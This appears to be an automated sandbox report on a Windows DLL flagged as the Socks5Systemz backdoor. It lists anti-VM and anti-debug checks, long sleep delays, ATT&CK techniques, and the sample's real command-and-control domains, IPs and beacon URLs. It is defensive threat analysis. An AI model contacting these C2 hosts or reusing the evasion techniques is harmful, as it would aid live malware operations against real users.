Code function: 0_2_6CED0C52 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6CED0C52

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,

0_2_6CEC8107

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-20568

Source: C:\Windows\System32\loaddll32.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: loaddll32.exe, 00000000.00000002.3600686711.000000000104D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWo
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: loaddll32.exe, 00000000.00000002.3600686711.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.00000000010AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000003.00000003.2063266726.00000000033F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\loaddll32.exe

API call chain: ExitProcess graph end node

graph_0-20569

Source: C:\Windows\SysWOW64\rundll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CED8F6E EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_6CED8F6E

Source: C:\Windows\System32\loaddll32.exe

0_2_6CED8F6E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CEC8107 LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,

0_2_6CEC8107

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CEB68FD InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,EnterCriticalSection,LeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,Sleep,EnterCriticalSection,LeaveCriticalSection,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,EnterCriticalSection,LeaveCriticalSection,_malloc,EnterCriticalSection,LeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,EnterCriticalSection,LeaveCriticalSection,_sprintf,_malloc,_free,

0_2_6CEB68FD

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CED1A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CED1A28

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CED07BD cpuid

0_2_6CED07BD

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CED47B1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CED47B1

Source: C:\Windows\System32\loaddll32.exe

0_2_6CEB68FD

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Socks5Systemz

Source: Yara match	File source: cNF6fXdjPw.dll, type: SAMPLE
Source: Yara match	File source: 0.2.loaddll32.exe.6ceb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7584, type: MEMORYSTR

Remote Access Functionality

Yara detected Socks5Systemz

Source: Yara match	File source: cNF6fXdjPw.dll, type: SAMPLE
Source: Yara match	File source: 0.2.loaddll32.exe.6ceb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7584, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 Bootkit	11 Process Injection	31 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	LSASS Memory	61 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Bootkit	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	112 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
cNF6fXdjPw.dll	76%	ReversingLabs	Win32.Backdoor.TeviRat
cNF6fXdjPw.dll	100%	Avira	HEUR/AGEN.1303070
cNF6fXdjPw.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.237.206.129/	0%	Avira URL Cloud	safe
gjeqiox.com	0%	Avira URL Cloud	safe
http://94.232.249.187/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e	0%	Avira URL Cloud	safe
http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353	0%	Avira URL Cloud	safe
http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4	0%	Avira URL Cloud	safe
http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16	0%	Avira URL Cloud	safe
http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4	0%	Avira URL Cloud	safe
http://eeikzox.ua/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16	0%	Avira URL Cloud	safe
http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
eeikzox.ua	94.232.249.187	true	true		unknown
gjeqiox.com	185.237.206.129	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://eeikzox.ua/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16	true	Avira URL Cloud: safe	unknown
http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4	true	Avira URL Cloud: safe	unknown
http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16	true	Avira URL Cloud: safe	unknown
http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4	true	Avira URL Cloud: safe	unknown
gjeqiox.com	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.232.249.187/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e	loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://185.237.206.129/	loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353	loaddll32.exe, 00000000.00000002.3600686711.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353	loaddll32.exe, 00000000.00000002.3600686711.00000000010AA000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.155.250.225	unknown	Germany	34549	MEER-ASmeerfarbigGmbHCoKGDE	false
94.232.249.187	eeikzox.ua	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	true
185.237.206.129	gjeqiox.com	Ukraine	21100	ITLDC-NLUA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575251
Start date and time:	2024-12-15 00:46:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	cNF6fXdjPw.dll renamed because original name is a hash value
Original Sample Name:	76436512E3E3A9DCA38F5EAF312FE323.dll
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@7/8@7/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 42 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .dll Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.53.19, 52.149.20.212, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: cNF6fXdjPw.dll

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.155.250.225	qn27KP0l9U.exe	Get hash	malicious	Socks5Systemz	Browse
94.232.249.187	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
185.237.206.129	Invoice.xlsx	Get hash	malicious	FormBook	Browse	185.237.206.129/jinn.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ITLDC-NLUA	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	185.237.206.129
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	185.237.206.129
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	185.237.206.129
	file.exe	Get hash	malicious	AgentTesla	Browse	185.174.173.22
	secure.htm	Get hash	malicious	HTMLPhisher	Browse	217.12.218.219
	EIqeWlQMGR.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	9WqvcxYptm.exe	Get hash	malicious	AgentTesla	Browse	185.174.173.22
	sd2.ps1	Get hash	malicious	Unknown	Browse	195.123.217.43
	Pago_7839389309_8w20w808_723869189.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exe	Get hash	malicious	MassLogger RAT	Browse	185.174.173.22
MEER-ASmeerfarbigGmbHCoKGDE	x86_64.elf	Get hash	malicious	Unknown	Browse	45.90.96.167
	arm.elf	Get hash	malicious	Unknown	Browse	45.90.96.167
	spc.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
	sh4.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
	mips.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
	ppc.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
	arm5.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
	arm7.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
	arm6.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
	m68k.elf	Get hash	malicious	Unknown	Browse	45.90.96.167
INT-PDN-STE-ASSTEPDNInternalASSY	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	jade.arm.elf	Get hash	malicious	Mirai	Browse	31.9.99.97
	jade.ppc.elf	Get hash	malicious	Mirai	Browse	95.212.143.36
	jade.x86.elf	Get hash	malicious	Mirai	Browse	31.14.164.17
	Josho.ppc.elf	Get hash	malicious	Unknown	Browse	95.212.143.56
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	178.171.212.67

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c0255ceba776fb6ab24614abd9fcaae546a755_7522e4b5_44eca6bd-f2e7-40a2-818a-3bde49c10140\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9630065285507492
Encrypted:	false
SSDEEP:	192:lClMiqOm/w0e7B4LjeT1QzuiF9Z24IO8dci:lfiLWLe7B6jeOzuiF9Y4IO8dci
MD5:	652A04584DB8E858C258A5D9866F1D2B
SHA1:	F0FDBED67EF890E561C2CD61C495B4782255C04B
SHA-256:	87AD85F38D35A347324394872F6A3DEAAB31FE81C7C33F2DA8438FB1BACC484F
SHA-512:	F7CE695553CB60A8BB7AE8FE87651F459A67F089B2F2DE2B96F8C0104903DE030E5B852A59BBB35F1AD46AFE6A74FE1786950FE9C560E376B5F3A626E0C493E5
Malicious:	false
Reputation:	low
